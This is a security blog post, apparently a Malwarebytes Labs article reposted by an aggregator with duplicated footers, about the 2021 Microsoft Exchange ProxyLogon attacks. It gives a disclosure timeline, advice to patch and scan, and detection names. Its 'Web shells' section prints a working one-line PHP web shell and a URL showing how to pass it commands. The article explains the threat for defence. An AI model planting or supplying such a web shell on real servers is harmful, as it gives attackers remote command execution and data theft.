Malwarebytes’ generic detection name for malicious web shells is Backdoor.WebShell and the detection name for the web shells that are tied directly to the Hafnium group is Backdoor.Hafnium.

Nebula detections Backdoor.Hafnium — Malwarebytes detecting Backdoor.Hafnium

Stay safe, everyone!

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malwarebytes Labs.

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting-2/?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting-2

Microsoft Exchange attacks cause panic as criminals go shell collecting

How did this situation evolve? A timeline

To demonstrate how this situation came about we want to show you this timeline of developments:

December 2020, CVE-2021-26855 is discovered by DEVCORE, who named the vulnerability ProxyLogon.
January 2021, DEVCORE send an advisory and exploit to Microsoft through the MSRC portal.
January 2021, Volexity and Dubex start to see exploitation of Exchange vulnerabilities.
January 27, 2021, Dubex shares its findings with Microsoft.
February 2, 2021, Volexity informs Microsoft of its findings.
March 2, 2021, Microsoft publishes a patch and advisory, which has been updated a few times since then.
March 4, 2021, The Cybersecurity and Infrastructure Security Agency issues an emergency directive after CISA partners observe active exploitation of vulnerabilities in Microsoft Exchange on-premises products.
March 5, 2021, Microsoft and many security vendors see increased use of these vulnerabilities in attacks targeting unpatched systems, by multiple malicious actors, not just Hafnium.
March 8, 2021, CISA issues a warning that it is aware of widespread domestic and international exploitation of these vulnerabilities.

The attacks went from a limited Advanced Persistent Threat (APT) used against targeted victims to crypto m ining operations run by “common” cybercriminals in no time flat.

Victims

Web shells

<?=`$_GET[1]`?>

www.example.com/index.html?1={command}

As you can see the use of this type of backdoor is easy. Once you have planted the web shell, you can use it to create additional web shells or steal information from the server.

What can we do?

Patch as soon as you can.

Scan your server for the presence of malicious web shells. Security vendors have added detection for the publicly posted IOCs and some will detect other malicious web shells as well.

Malwarebytes’ generic detection name for malicious web shells is Backdoor.WebShell and the detection name for the web shells that are tied directly to the Hafnium group is Backdoor.Hafnium.

Stay safe, everyone!

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malware Devil.

https://malwaredevil.com/2021/03/09/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting